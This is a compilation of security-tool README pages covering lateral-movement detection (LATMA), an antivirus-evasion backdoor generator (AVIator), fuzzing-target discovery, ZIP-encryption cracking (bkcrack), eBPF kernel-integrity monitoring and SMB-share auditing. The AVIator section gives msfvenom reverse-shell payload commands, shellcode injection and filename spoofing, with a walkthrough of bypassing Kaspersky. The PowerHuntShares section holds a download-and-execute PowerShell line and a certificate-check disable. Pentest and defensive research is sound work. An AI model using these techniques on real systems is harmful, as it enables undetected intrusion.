  1. Kerberos - Computer configuration -> policies -> Windows Settings -> Security settings -> Local policies -> Audit Policies -> audit account logon events
  2. NTLM - Computer Configuration -> Policies -> Windows Settings -> Security Settings -> Local Policies -> Security Options -> Network Security: Restrict NTLM: audit NTLM authentication in this domain

The Analyzer

The Analyzer receives as input a spreadsheet with authentication data formatted as specified in Collector's output structure. It searches for suspicious activity with the lateral movement analyzer algorithm and also detects additional IoCs of lateral movement. The authentication source and destination should be formalized with netbios name and not ip addresses.

Preliminaries and key concepts of the LATMA algorithm

LATMA gets a batch of authentication requests and sends an alert when it finds suspicious lateral movement attacks. We define the following:

  • Authentication Graph: A directed graph that contains information about authentication traffic in the environment. The nodes of the graphs are computers, and the edges are authentications between the computers. The graph edges have the attributes: protocol type, date of authentication and the account that sent the request. The graph nodes contain information about the computer it represents, detailed below.

  • Lateral movement graph: A sub-graph of the authentication graph that represents the attackerโ€™s movement. The lateral movement graph is not always a path in the sub-graph, in some attacks the attacker goes in many different directions.

  • Alert: A sub-graph the algorithm suspects are part of the lateral movement graph.

LATMA performs several actions during its execution:

  • Information gathering: LATMA monitors normal behavior of the users and machines and characterizes them. The learning is used later to decide which authentication requests deviate from a normal behavior and might be involved in a lateral movement attack. For a learning period of three weeks LATMA does not throw any alerts and only learns the environment. The learning continues after those three weeks.

  • Authentication graph building: After the learning period every relevant authentication is added to the authentication graph. It is critical to filter only for relevant authentication, otherwise the number of edges the graph holds might be too big. We filter on the following protocol types: NTLM and Kerberos with the services โ€œrpcโ€, โ€œrpcssโ€ and โ€œtermsrv.โ€

Alert handling:

Adding an authentication to the graph might trigger a process of alerting. In general, a new edge can create a new alert, join an existing alert or merge two alerts.

Information gathering

Every authentication request monitored by LATMA is used for learning and stored in a dedicated data structure. First, we identify sinks and hubs. We define sinks as machines accessed by many (at least 50) different accounts, such as a company portal or exchange server. We define hubs as machines many different accounts (at least 20) authenticate from, such as proxies and VPNs. Authentications to sinks or from hubs are considered benign and are therefore removed from the authentication graph.

In addition to basic classification, LATMA matches between accounts and machines they frequently authenticate from. If an account authenticates from a machine at least three different days in a three weeksโ€™ period, it means that this account matches the machine and any authentication of this account from the machine is considered benign and removed from the authentication graph.

The lateral movement IoCs are:

Whiteโ€ฏ cane โ€ฏ- User accounts authenticating from a single machine to multiple ones in a relatively short time.

Bridge - User account X authenticating from machine A to machine B and following that, from machine B to machine C. This IoC potentially indicates an attacker performing actual advance from its initial foothold (A) to destination machine that better serves the attackโ€™s objectives.

Switched Bridge - User account X authenticating from machine A to machine B, followed by user account Y authenticating from machine B to machine C. This IoC potentially indicates an attacker that discovers and compromises an additional account along its path and uses the new account to advance forward (a common example is account X being a standard domain user and account Y being a admin user)

Weight Shift - White cane (see above) from machine A to machines {B1,โ€ฆ, Bn}, followed by another White cane from machine Bx to machines {C1,โ€ฆ,Cn}. This IoC potentially indicates an attacker that has determined that machine B would better serve the attackโ€™s purposes from now on uses machine B as the source for additional searches.

Blast - User account X authenticating from machine A to multiple machines in a very short timeframe. A common example is an attacker that plants \ executes ransomware on a mass number of machines simultaneously

Output:

The analyzer outputs several different files

  1. A spreadsheet with all the suspected authentications (all_authentications.csv) and their role classification and a different spreadsheet for the authentications that are suspected to be part of lateral movement (propagation.csv)
  2. A GIF file represents the progression, wherby each frame of the GIF specifies exactly what was the suspicious action
  3. An interactive timeline with all the suspicious events. Events that are related to each other have the same color

Dependencies:

  1. Python 3.8
  2. libraries as follows in requirements.txt
  3. Run pip install . for running setup automatically
  4. Audit Kerberos and NTLM across the environment
  5. LDAP queries to the domain controllers
  6. Domain admin credentials or any credentials with MS-EVEN6 remote event viewer permissions.

usage

The Collector

Required arguments:

  1. credentials [domain.com/]username[:password] credentials format alternatively [domain.com/]username and then password will be prompted securely. For domain please insert the FQDN (Fully Quallified Domain Name). Optional arguments:
  2. -ntlm Retrieve ntlm authentication logs from DC
  3. -kerberos Retrieve kerberos authentication logs from all computers in the domain
  4. -debug Turn DEBUG output ON
  5. -help show this help message and exit
  6. -filter Query specific ou or container in the domain, will result all workstations in the sub-OU as well. Each OU will be in format of DN (Distinguished Name). Supports multiple OUs with a semicolon delimiter. Example: OU=subunit,OU=unit;OU=anotherUnit,DC=domain,DC=com Example: CN=container,OU=unit;OU=anotherUnit,DC=domain,DC=com
  7. -date Starting date to collect event logs from. month-day-year format, if not specified take all available data
  8. -threads amount of working threads to use
  9. -ldap Use Unsecure LDAP instead of LDAP/S
  10. -ldap_domain Custom domain on ldap login credentials. If empty, will use current user's session domain

The Analyzer

Required arguments:

  1. authentication_file authentication file should contain list of NTLM and Kerberos requests

Optional arguments: 2. -output_file The location the csv with the all the IOCs is going to be saved to 3. -progression_output_file The location the csv with the the IOCs of the lateral movements is going to be save to 4. -sink_threshold number of accounts from which a machine is considered sink, default is 50 5. -hub_threshold number of accounts from which a machine is considered hub, default is 20 6. -learning_period learning period in days, default is 7 days 7. -show_all_iocs Show IoC that are not connected to any other IoCs 8. -show_gant If true, output the events in a gant format

Binary Usage Open command prompt and navigate to the binary folder. Run executables with the specified above arguments.

Examples

In the example files you have several samples of real environments (some contain lateral movement attacks and some don't) which you can give as input for the analyzer.

Usage example

  1. python eventlogcollector.py domain.com/username:password -ntlm -kerberos
  2. python analyzer.py logs.csv


AVIator - Antivirus Evasion Project


AviAtor Ported to NETCore 5 with an updated UI


AV|Ator

About://name

AV: AntiVirus

Ator: Is a swordsman, alchemist, scientist, magician, scholar, and engineer, with the ability to sometimes produce objects out of thin air (https://en.wikipedia.org/wiki/Ator)

About://purpose

AV|Ator is a backdoor generator utility, which uses cryptographic and injection techniques in order to bypass AV detection. More specifically:

  • It uses AES encryption in order to encrypt a given shellcode
  • Generates an executable file which contains the encrypted payload
  • The shellcode is decrypted and injected to the target system using various injection techniques

[https://attack.mitre.org/techniques/T1055/]:

  1. Portable executable injection which involves writing malicious code directly into the process (without a file on disk) then invoking execution with either additional code or by creating a remote thread. The displacement of the injected code introduces the additional requirement for functionality to remap memory references. Variations of this method such as reflective DLL injection (writing a self-mapping DLL into a process) and memory module (map DLL when writing into process) overcome the address relocation issue.

  2. Thread execution hijacking which involves injecting malicious code or the path to a DLL into a thread of a process. Similar to Process Hollowing, the thread must first be suspended.


Usage

The application has a form which consists of three main inputs (See screenshot bellow):

  1. A text containing the encryption key used to encrypt the shellcode
  2. A text containing the IV used for AES encryption
  3. A text containing the shellcode

Important note: The shellcode should be provided as a C# byte array.

The default values contain shellcode that executes notepad.exe (32bit). This demo is provided as an indication of how the code should be formed (using msfvenom, this can be easily done with the -f csharp switch, e.g. msfvenom -p windows/meterpreter/reverse_tcp LHOST=X.X.X.X LPORT=XXXX -f csharp).

After filling the provided inputs and selecting the output path an executable is generated according to the chosen options.

RTLO option

In simple words, spoof an executable file to look like having an "innocent" extention like 'pdf', 'txt' etc. E.g. the file "testcod.exe" will be interpreted as "tesexe.doc"

Beware of the fact that some AVs alert the spoof by its own as a malware.

Set custom icon

I guess you all know what it is :)

Bypassing Kaspersky AV on a Win 10 x64 host (TEST CASE)

Getting a shell in a windows 10 machine running fully updated kaspersky AV

Target Machine: Windows 10 x64

  1. Create the payload using msfvenom

    msfvenom -p windows/x64/shell/reverse_tcp_rc4 LHOST=10.0.2.15 LPORT=443 EXITFUNC=thread RC4PASSWORD=S3cr3TP4ssw0rd -f csharp

  2. Use AVIator with the following settings

    Target OS architecture: x64

    Injection Technique: Thread Hijacking (Shellcode Arch: x64, OS arch: x64)

    Target procedure: explorer (leave the default)

  3. Set the listener on the attacker machine

  4. Run the generated exe on the victim machine

Installation

Windows:

Either compile the project or download the allready compiled executable from the following folder:

https://github.com/Ch0pin/AVIator/tree/master/Compiled%20Binaries

Linux:

Install Mono according to your linux distribution, download and run the binaries

e.g. in kali:

   root@kali# apt install mono-devel 

root@kali# mono aviator.exe

Credits

To Damon Mohammadbagher for the encryption procedure

Disclaimer

I developed this app in order to overcome the demanding challenges of the pentest process and this is the ONLY WAY that this app should be used. Make sure that you have the required permission to use it against a system and never use it for illegal purposes.



Fuzzable - Framework For Automating Fuzzable Target Discovery With Static Analysis


Framework for Automating Fuzzable Target Discovery with Static Analysis.

Introduction

Vulnerability researchers conducting security assessments on software will often harness the capabilities of coverage-guided fuzzing through powerful tools like AFL++ and libFuzzer. This is important as it automates the bughunting process and reveals exploitable conditions in targets quickly. However, when encountering large and complex codebases or closed-source binaries, researchers have to painstakingly dedicate time to manually audit and reverse engineer them to identify functions where fuzzing-based exploration can be useful.

Fuzzable is a framework that integrates both with C/C++ source code and binaries to assist vulnerability researchers in identifying function targets that are viable for fuzzing. This is done by applying several static analysis-based heuristics to pinpoint risky behaviors in the software and the functions that executes them. Researchers can then utilize the framework to generate basic harness templates, which can then be used to hunt for vulnerabilities, or to be integrated as part of a continuous fuzzing pipeline, such as Google's oss-fuzz project.

In addition to running as a standalone tool, Fuzzable is also integrated as a plugin for the Binary Ninja disassembler, with support for other disassembly backends being developed.

Check out the original blog post detailing the tool here, which highlights the technical specifications of the static analysis heuristics and how this tool came about. This tool is also featured at Black Hat Arsenal USA 2022.


Features

  • Supports analyzing binaries (with Angr and Binary Ninja) and source code artifacts (with tree-sitter).
  • Run static analysis both as a standalone CLI tool or a Binary Ninja plugin.
  • Harness generation to ramp up on creating fuzzing campaigns quickly.

Installation

Some binary targets may require some sanitizing (ie. signature matching, or identifying functions from inlining), and therefore fuzzable primarily uses Binary Ninja as a disassembly backend because of it's ability to effectively solve these problems. Therefore, it can be utilized both as a standalone tool and plugin.

Since Binary Ninja isn't accessible to all and there may be a demand to utilize for security assessments and potentially scaling up in the cloud, an angr fallback backend is also supported. I anticipate to incorporate other disassemblers down the road as well (priority: Ghidra).

Command Line (Standalone)

If you have Binary Ninja Commercial, be sure to install the API for standalone headless usage:

$ python3 /Applications/Binary\ Ninja.app/Contents/Resources/scripts/install_api.py

Install with pip:

$ pip install fuzzable

Manual/Development Build

We use poetry for dependency management and building. To do a manual build, clone the repository with the third-party modules:

$ git clone --recursive https://github.com/ex0dus-0x/fuzzable

To install manually:

$ cd fuzzable/

# without poetry
$ pip install .

# with poetry
$ poetry install

# with poetry for a development virtualenv
$ poetry shell

You can now analyze binaries and/or source code with the tool!

# analyzing a single shared object library binary
$ fuzzable analyze examples/binaries/libbasic.so

# analyzing a single C source file
$ fuzzable analyze examples/source/libbasic.c

# analyzing a workspace with multiple C/C++ files and headers
$ fuzzable analyze examples/source/source_bundle/

Binary Ninja Plugin

fuzzable can be easily installed through the Binary Ninja plugin marketplace by going to Binary Ninja > Manage Plugins and searching for it. Here is an example of the fuzzable plugin running, accuracy identifying targets for fuzzing and further vulnerability assessment:

Usage

fuzzable comes with various options to help better tune your analysis. More will be supported in future plans and any feature requests made.

Static Analysis Heuristics

To determine fuzzability, fuzzable utilize several heuristics to determine which targets are the most viable to target for dynamic analysis. These heuristics are all weighted differently using the scikit-criteria library, which utilizes multi-criteria decision analysis to determine the best candidates. These metrics and are there weights can be seen here:

Heuristic Description Weight
Fuzz Friendly Name Symbol name implies behavior that ingests file/buffer input 0.3
Risky Sinks Arguments that flow into risky calls (ie memcpy) 0.3
Natural Loops Number of loops detected with the dominance frontier 0.05
Cyclomatic Complexity Complexity of function target based on edges + nodes 0.05
Coverage Depth Number of callees the target traverses into 0.3

As mentioned, check out the technical blog post for a more in-depth look into why and how these metrics are utilized.

Many metrics were largely inspired by Vincenzo Iozzo's original work in 0-knowledge fuzzing.

Every targets you want to analyze is diverse, and fuzzable will not be able to account for every edge case behavior in the program target. Thus, it may be important during analysis to tune these weights appropriately to see if different results make more sense for your use case. To tune these weights in the CLI, simply specify the --score-weights argument:

$ fuzzable analyze <TARGET> --score-weights=0.2,0.2,0.2,0.2,0.2

Analysis Filtering

By default, fuzzable will filter out function targets based on the following criteria:

  • Top-level entry calls - functions that aren't called by any other calls in the target. These are ideal entry points that have potentially very high coverage.
  • Static calls - (source only) functions that are static and aren't exposed through headers.
  • Imports - (binary only) other library dependencies being used by the target's implementations.

To see calls that got filtered out by fuzzable, set the --list_ignored flag:

$ fuzzable analyze --list-ignored <TARGET>

In Binary Ninja, you can turn this setting in Settings > Fuzzable > List Ignored Calls.

In the case that fuzzable falsely filters out important calls that should be analyzed, it is recommended to use --include-* arguments to include them during the run:

# include ALL non top-level calls that were filtered out
$ fuzzable analyze --include-nontop <TARGET>

# include specific symbols that were filtered out
$ fuzzable analyze --include-sym <SYM> <TARGET>

In Binary Ninja, this is supported through Settings > Fuzzable > Include non-top level calls and Symbols to Exclude.

Harness Generation

Now that you have found your ideal candidates to fuzz, fuzzable will also help you generate fuzzing harnesses that are (almost) ready to instrument and compile for use with either a file-based fuzzer (ie. AFL++, Honggfuzz) or in-memory fuzzer (libFuzzer). To do so in the CLI:

If this target is a source codebase, the generic source template will be used.

If the target is a binary, the generic black-box template will be used, which ideally can be used with a fuzzing emulation mode like AFL-QEMU. A copy of the binary will also be created as a shared object if the symbol isn't exported directly to be dlopened using LIEF.

At the moment, this feature is quite rudimentary, as it simply will create a standalone C++ harness populated with the appropriate parameters, and will not auto-generate code that is needed for any runtime behaviors (ie. instantiating and freeing structures). However, the templates created for fuzzable should get still get you running quickly. Here are some ambitious features I would like to implement down the road:

  • Full harness synthesis - harnesses will work directly with absolutely no manual changes needed.
  • Synthesis from potential unit tests using the DeepState framework (Source only).
  • Immediate deployment to a managed continuous fuzzing fleet.

Exporting Reports

fuzzable supports generating reports in various formats. The current ones that are supported are JSON, CSV and Markdown. This can be useful if you are utilizing this as part of automation where you would like to ingest the output in a serializable format.

In the CLI, simply pass the --export argument with a filename with the appropriate extension:

$ fuzzable analyze --export=report.json <TARGET>

In Binary Ninja, go to Plugins > Fuzzable > Export Fuzzability Report > ... and select the format you want to export to and the path you want to write it to.

Contributing

This tool will be continuously developed, and any help from external mantainers are appreciated!

  • Create an issue for feature requests or bugs that you have come across.
  • Submit a pull request for fixes and enhancements that you would like to see contributed to this tool.

License

Fuzzable is licensed under the MIT License.



Bkcrack - Crack Legacy Zip Encryption With Biham And Kocher's Known Plaintext Attack


Crack legacy zip encryption with Biham and Kocher's known plaintext attack.

Overview

A ZIP archive may contain many entries whose content can be compressed and/or encrypted. In particular, entries can be encrypted with a password-based Encryption Algorithm symmetric encryption algorithm referred to as traditional PKWARE encryption, legacy encryption or ZipCrypto. This algorithm generates a pseudo-random stream of bytes (keystream) which is XORed to the entry's content (plaintext) to produce encrypted data (ciphertext). The generator's state, made of three 32-bits integers, is initialized using the password and then continuously updated with plaintext as encryption goes on. This encryption algorithm is vulnerable to known plaintext attacks as shown by Eli Biham and Paul C. Kocher in the research paper A known plaintext attack on the PKZIP stream cipher. Given ciphertext and 12 or more bytes of the corresponding plaintext, the internal state of the keystream generator can be recovered. This internal state is enough to decipher ciphertext entirely as well as other entries which were encrypted with the same password. It can also be used to bruteforce the password with a complexity of nl-6 where n is the size of the character set and l is the length of the password.

bkcrack is a command-line tool which implements this known plaintext attack. The main features are:

  • Recover internal state from ciphertext and plaintext.
  • Change a ZIP archive's password using the internal state.
  • Recover the original password from the internal state.

Install

Precompiled packages

You can get the latest official release on GitHub.

Precompiled packages for Ubuntu, MacOS and Windows are available for download. Extract the downloaded archive wherever you like.

On Windows, Microsoft runtime libraries are needed for bkcrack to run. If they are not already installed on your system, download and install the latest Microsoft Visual C++ Redistributable package.

Compile from source

Alternatively, you can compile the project with CMake.

First, download the source files or clone the git repository. Then, running the following commands in the source tree will create an installation in the install folder.

cmake -S . -B build -DCMAKE_INSTALL_PREFIX=install
cmake --build build --config Release
cmake --build build --config Release --target install

Thrid-party packages

bkcrack is available in the package repositories listed on the right. Those packages are provided by external maintainers.

Usage

List entries

You can see a list of entry names and metadata in an archive named archive.zip like this:

bkcrack -L archive.zip

Entries using ZipCrypto encryption are vulnerable to a known-plaintext attack.

Recover internal keys

The attack requires at least 12 bytes of known plaintext. At least 8 of them must be contiguous. The larger the contiguous known plaintext, the faster the attack.

Load data from zip archives

Having a zip archive encrypted.zip with the entry cipher being the ciphertext and plain.zip with the entry plain as the known plaintext, bkcrack can be run like this:

bkcrack -C encrypted.zip -c cipher -P plain.zip -p plain

Load data from files

Having a file cipherfile with the ciphertext (starting with the 12 bytes corresponding to the encryption header) and plainfile with the known plaintext, bkcrack can be run like this:

bkcrack -c cipherfile -p plainfile

Offset

If the plaintext corresponds to a part other than the beginning of the ciphertext, you can specify an offset. It can be negative if the plaintext includes a part of the encryption header.

bkcrack -c cipherfile -p plainfile -o offset

Sparse plaintext

If you know little contiguous plaintext (between 8 and 11 bytes), but know some bytes at some other known offsets, you can provide this information to reach the requirement of a total of 12 known bytes. To do so, use the -x flag followed by an offset and bytes in hexadecimal.

bkcrack -c cipherfile -p plainfile -x 25 4b4f -x 30 21

Number of threads

If bkcrack was built with parallel mode enabled, the number of threads used can be set through the environment variable OMP_NUM_THREADS.

Decipher

If the attack is successful, the deciphered data associated to the ciphertext used for the attack can be saved:

bkcrack -c cipherfile -p plainfile -d decipheredfile

If the keys are known from a previous attack, it is possible to use bkcrack to decipher data:

bkcrack -c cipherfile -k 12345678 23456789 34567890 -d decipheredfile

Decompress

The deciphered data might be compressed depending on whether compression was used or not when the zip file was created. If deflate compression was used, a Python 3 script provided in the tools folder may be used to decompress data.

python3 tools/inflate.py < decipheredfile > decompressedfile

Unlock encrypted archive

It is also possible to generate a new encrypted archive with the password of your choice:

bkcrack -C encrypted.zip -k 12345678 23456789 34567890 -U unlocked.zip password

The archive generated this way can be extracted using any zip file utility with the new password. It assumes that every entry was originally encrypted with the same password.

Recover password

Given the internal keys, bkcrack can try to find the original password. You can look for a password up to a given length using a given character set:

bkcrack -k 1ded830c 24454157 7213b8c5 -r 10 ?p

You can be more specific by specifying a minimal password length:

bkcrack -k 18f285c6 881f2169 b35d661d -r 11..13 ?p

Learn

A tutorial is provided in the example folder.

For more information, have a look at the documentation and read the source.

Contribute

Do not hesitate to suggest improvements or submit pull requests on GitHub.

License

This project is provided under the terms of the zlib/png license.



KRIe - Linux Kernel Runtime Integrity With eBPF


KRIe is a research project that aims to detect Linux Kernel exploits with eBPF. KRIe is far from being a bulletproof strategy: from eBPF related limitations to post exploitation detections that might rely on a compromised kernel to emit security events, it is clear that a motivated attacker will eventually be able to bypass it. That being said, the goal of the project is to make attackers' lives harder and ultimately prevent out-of-the-box exploits from working on a vulnerable kernel.

KRIe has been developed using CO-RE (Compile Once - Run Everywhere) so that it is compatible with a large range of kernel versions. If your kernel doesn't export its BTF debug information, KRIe will try to download it automatically from BTFHub. If your kernel isn't available on BTFHub, but you have been able to manually generate your kernel's BTF data, you can provide it in the configuration file (see below).


System requirements

This project was developed on Ubuntu Focal 20.04 (Linux Kernel 5.15) and has been tested on older releases down to Ubuntu Bionic 18.04 (Linux Kernel 4.15).

  • golang 1.18+
  • (optional) Kernel headers are expected to be installed in lib/modules/$(uname -r), update the Makefile with their location otherwise.
  • (optional) clang & llvm 14.0.6+

Optional fields are required to recompile the eBPF programs.

Build

  1. Since KRIe was built using CORE, you shouldn't need to rebuild the eBPF programs. That said, if you want still want to rebuild the eBPF programs, you can use the following command:
# ~ make build-ebpf
  1. To build KRIE, run:
# ~ make build
  1. To install KRIE (copy to /usr/bin/krie) run:
# ~ make install

Getting started

KRIe needs to run as root. Run sudo krie -h to get help.

# ~ krie -h
Usage:
krie [flags]

Flags:
--config string KRIe config file (default "./cmd/krie/run/config/default_config.yaml")
-h, --help help for krie

Configuration

## Log level, options are: panic, fatal, error, warn, info, debug or trace
log_level: debug

## JSON output file, leave empty to disable JSON output.
output: "/tmp/krie.json"

## BTF information for the current kernel in .tar.xz format (required only if KRIE isn't able to locate it by itself)
vmlinux: ""

## events configuration
events:
## action taken when an init_module event is detected
init_module: log

## action taken when an delete_module event is detected
delete_module: log

## action taken when a bpf event is detected
bpf: log

## action taken when a bpf_filter event is detected
bpf_filter: log

## action taken when a ptrace event is detected
ptrace: log

## action taken when a kprobe event is detected
kprobe: log

## action taken when a sysctl event is detected
sysctl:
action: log

## Default settings for sysctl programs (kernel 5.2+ only)
sysctl_default:
block_read_access: false
block_write_access: false

## Custom settings for sysctl programs (kernel 5.2+ only)
sysctl_parameters:
kernel/yama/ptrace_scope:
block_write_access: true
kernel/ftrace_enabled:
override_input_value_with: "1\n"

## action taken when a hooked_syscall_table event is detected
hooked_syscall_table: log

## action taken when a hooked_syscall event is detected
hooked_syscall: log

## kernel_parameter event configuration
kernel_parameter:
action: log
periodic_action: log
ticker: 1 # sends at most one event every [ticker] second(s)
list:
- symbol: system/kprobes_all_disarmed
expected_value: 0
size: 4
# - symbol: system/selinux_state
# expecte d_value: 256
# size: 2

# sysctl
- symbol: system/ftrace_dump_on_oops
expected_value: 0
size: 4
- symbol: system/kptr_restrict
expected_value: 0
size: 4
- symbol: system/randomize_va_space
expected_value: 2
size: 4
- symbol: system/stack_tracer_enabled
expected_value: 0
size: 4
- symbol: system/unprivileged_userns_clone
expected_value: 0
size: 4
- symbol: system/unprivileged_userns_apparmor_policy
expected_value: 1
size: 4
- symbol: system/sysctl_unprivileged_bpf_disabled
expected_value: 1
size: 4
- symbol: system/ptrace_scope
expected_value: 2
size: 4
- symbol: system/sysctl_perf_event_paranoid
expected_value: 2
size: 4
- symbol: system/kexe c_load_disabled
expected_value: 1
size: 4
- symbol: system/dmesg_restrict
expected_value: 1
size: 4
- symbol: system/modules_disabled
expected_value: 0
size: 4
- symbol: system/ftrace_enabled
expected_value: 1
size: 4
- symbol: system/ftrace_disabled
expected_value: 0
size: 4
- symbol: system/sysctl_protected_fifos
expected_value: 1
size: 4
- symbol: system/sysctl_protected_hardlinks
expected_value: 1
size: 4
- symbol: system/sysctl_protected_regular
expected_value: 2
size: 4
- symbol: system/sysctl_protected_symlinks
expected_value: 1
size: 4
- symbol: system/sysctl_unprivileged_userfaultfd
expected_value: 0
size: 4

## action to check when a regis ter_check fails on a sensitive kernel space hook point
register_check: log

Documentation

License

  • The golang code is under Apache 2.0 License.
  • The eBPF programs are under the GPL v2 License.


PowerHuntShares - Audit Script Designed In Inventory, Analyze, And Report Excessive Privileges Configured On Active Directory Domains


PowerHuntShares is design to automatically inventory, analyze, and report excessive privilege assigned to SMB shares on Active Directory domain joined computers.
It is intented to help IAM and other blue teams gain a better understand of their SMB Share attack surface and provides data insights to help naturally group related share to help stream line remediation efforts at scale.


It supports functionality to:

  • Authenticate using the current user context, a credential, or clear text user/password.
  • Discover accessible systems associated with an Active Directory domain automatically. It will also filter Active Directory computers based on available open ports.
  • Target a single computer, list of computers, or discovered Active Directory computers (default).
  • Collect SMB share ACL information from target computers using PowerShell.
  • Analyze collected Share ACL data.
  • Report summary reports and excessive privilege details in HTML and CSV file formats.

Excessive SMB share ACLs are a systemic problem and an attack surface that all organizations struggle with. The goal of this project is to provide a proof concept that will work towards building a better share collection and data insight engine that can help inform and priorititize remediation efforts.

Bonus Features:

  • Generate directory listing dump for configurable depth
  • Search for file types across discovered shares

I've also put together a short presentation outlining some of the common misconfigurations and strategies for prioritizing remediation here: https://www.slideshare.net/nullbind/into-the-abyss-evaluating-active-directory-smb-shares-on-scale-secure360-251762721

Vocabulary

PowerHuntShares will inventory SMB share ACLs configured with "excessive privileges" and highlight "high risk" ACLs. Below is how those are defined in this context.

Excessive Privileges
Excessive read and write share permissions have been defined as any network share ACL containing an explicit ACE (Access Control Entry) for the "Everyone", "Authenticated Users", "BUILTIN\Users", "Domain Users", or "Domain Computers" groups. All provide domain users access to the affected shares due to privilege inheritance issues. Note there is a parameter that allow operators to add their own target groups.
Below is some additional background:

  • Everyone is a direct reference that applies to both unauthenticated and authenticated users. Typically only a null session is required to access those resources.
  • BUILTIN\Users contains Authenticated Users
  • Authenticated Users contains Domain Users on domain joined systems. That's why Domain Users can access a share when the share permissions have been assigned to "BUILTIN\Users".
  • Domain Users is a direct reference
  • Domain Users can also create up to 10 computer accounts by default that get placed in the Domain Computers group
  • Domain Users that have local administrative access to a domain joined computer can also impersonate the computer account.

Please Note: Share permissions can be overruled by NTFS permissions. Also, be aware that testing excluded share names containing the following keywords:

print$, prnproc$, printer, netlogon,and sysvol

High Risk Shares
In the context of this report, high risk shares have been defined as shares that provide unauthorized remote access to a system or application. By default, that includes the shares

 wwwroot, inetpub, c$, and admin$   
However, additional exposures may exist that are not called out beyond that.

Setup Commands

Below is a list of commands that can be used to load PowerHuntShares into your current PowerShell session. Please note that one of these will have to be run each time you run PowerShell is run. It is not persistent.

# Bypass execution policy restrictions
Set-ExecutionPolicy -Scope Process Bypass

# Import module that exists in the current directory
Import-Module .\PowerHuntShares.psm1

or

# Reduce SSL operating level to support connection to github
[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true}
[Net.ServicePointManager]::SecurityProtocol =[Net.SecurityProtocolType]::Tls12

# Download and load PowerHuntShares.psm1 into memory
IEX(New-Object System.Net.WebClient).DownloadString("https://raw.githubusercontent.com/NetSPI/PowerHuntShares/main/PowerHuntShares.psm1")

Example Commands

Important Note: All commands should be run as an unprivileged domain user.

.EXAMPLE 1: Run from a domain computer. Performs Active Directory computer discovery by default.
PS C:\temp\test> Invoke-HuntSMBShares -Threads 100 -OutputDirectory c:\temp\test

.EXAMPLE 2: Run from a domain computer with alternative domain credentials. Performs Active Directory computer discovery by default.
PS C:\temp\test> Invoke-HuntSMBShares -Threads 100 -OutputDirectory c:\temp\test -Credentials domain\user

.EXAMPLE 3: Run from a domain computer as current user. Target hosts in a file. One per line.
PS C:\temp\test> Invoke-HuntSMBShares -Threads 100 -OutputDirectory c:\temp\test -HostList c:\temp\hosts.txt

.EXAMPLE 4: Run from a non-domain computer with credential. Performs Active Directory computer discovery by default.
C:\temp\test> runas /netonly /user:domain\user PowerShell.exe
PS C:\temp\test> Import-Module Invoke-HuntSMBShares.ps1
PS C:\temp\test> Invoke-HuntSMBShares -Threads 100 -Run SpaceTimeOut 10 -OutputDirectory c:\folder\ -DomainController 10.1.1.1 -Credential domain\user

===============================================================
PowerHuntShares
===============================================================
This function automates the following tasks:

o Determine current computer's domain
o Enumerate domain computers
o Filter for computers that respond to ping reqeusts
o Filter for computers that have TCP 445 open and accessible
o Enumerate SMB shares
o Enumerate SMB share permissions
o Identify shares with potentially excessive privielges
o Identify shares that provide reads & write access
o Identify shares thare are high risk
o Identify common share owners, names, & directory listings
o Generate creation, last written, & last accessed timelines
o Generate html summary report and detailed csv files

Note: This can take hours to run in large environments.
---------------------------------------------------------------
|||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
---------------------------------------------------------------
SHARE DISCOVERY
---------------------------------------------------------------
[*][03/01/2021 09:35] Scan Start
[*][03/01/2021 09:35] Output Directory: c:\temp\smbshares\SmbShareHunt-03012021093504
[*][03/01/2021 09:35] Successful connection to domain controller: dc1.demo.local
[*][03/01/2021 09:35] Performing LDAP query for computers associated with the demo.local domain
[*][03/01/2021 09:35] - 245 computers found
[*][03/01/2021 09:35] Pinging 245 computers
[*][03/01/2021 09:35] - 55 computers responded to ping requests.
[*][03/01/2021 09:35] Checking if TCP Port 445 is open on 55 computers
[*][03/01/2021 09:36] - 49 computers have TCP port 445 open.
[*][03/01/2021 09:36] Getting a list of SMB shares from 49 computers
[*][03/01/2021 09:36] - 217 SMB shares were found.
[*][03/01/2021 09:36] Getting share permissions from 217 SMB shares
[*][03/01/2021 09:37] - 374 share permissions were enumerated.
[*][03/01/2021 09:37] Getting directory listings from 33 SMB shares
[*][03/01/2021 09:37] - Targeting up to 3 nested directory levels
[*][03/01/2021 09:37] - 563 files and folders were enumerated.
[*][03/01/2021 09:37] Identifying potentially excessive share permissions
[*][03/01/2021 09:37] - 33 potentially excessive privileges were found across 12 systems..
[*][03/01/2021 09:37] Scan Complete
---------------------------------------------------------------
SHARE ANALYSIS
---------------------------------------------------------------
[*][03/01/2021 09:37] Analysis Start
[*][03/01/2021 09:37] - 14 shares can be read across 12 systems.
[*][03/01/2021 09:37] - 1 shares can be written to across 1 systems.
[*][03/01/2021 09:37] - 46 shares are considered non-default across 32 systems.
[*][03/01/2021 09:37] - 0 shares are considered high risk across 0 systems
[*][03/01/2021 09:37] - Identified top 5 owners of excessive shares.
[*][03/01/2021 09:37] - Identified top 5 share groups.
[*][03/01/2021 09:37] - Identified top 5 share names.
[*][03/01/2021 09:37] - Identified shares created in last 90 days.
[*][03/01/2021 09:37] - Identified shares accessed in last 90 days.
[*][03/01/2021 09:37] - Identified shares modified in last 90 days.
[*][03/01/2021 09:37] Analysis Complete
---------------------------------------------------------------
SHARE REPORT SUMMARY
---------------------------------------------------------------
[*][03/01/2021 09:37] Domain: demo.local
[*][03/01/2021 09:37] Start time: 03/01/2021 09:35:04
[*][03/01/2021 09:37] End time: 03/01/2021 09:37:27
[*][03/01/2021 09:37] R un time: 00:02:23.2759086
[*][03/01/2021 09:37]
[*][03/01/2021 09:37] COMPUTER SUMMARY
[*][03/01/2021 09:37] - 245 domain computers found.
[*][03/01/2021 09:37] - 55 (22.45%) domain computers responded to ping.
[*][03/01/2021 09:37] - 49 (20.00%) domain computers had TCP port 445 accessible.
[*][03/01/2021 09:37] - 32 (13.06%) domain computers had shares that were non-default.
[*][03/01/2021 09:37] - 12 (4.90%) domain computers had shares with potentially excessive privileges.
[*][03/01/2021 09:37] - 12 (4.90%) domain computers had shares that allowed READ access.
[*][03/01/2021 09:37] - 1 (0.41%) domain computers had shares that allowed WRITE access.
[*][03/01/2021 09:37] - 0 (0.00%) domain computers had shares that are HIGH RISK.
[*][03/01/2021 09:37]
[*][03/01/2021 09:37] SHARE SUMMARY
[*][03/01/2021 09:37] - 217 shares were found. We expect a minimum of 98 shares
[*][03/01/2021 09:37] because 49 systems had open ports a nd there are typically two default shares.
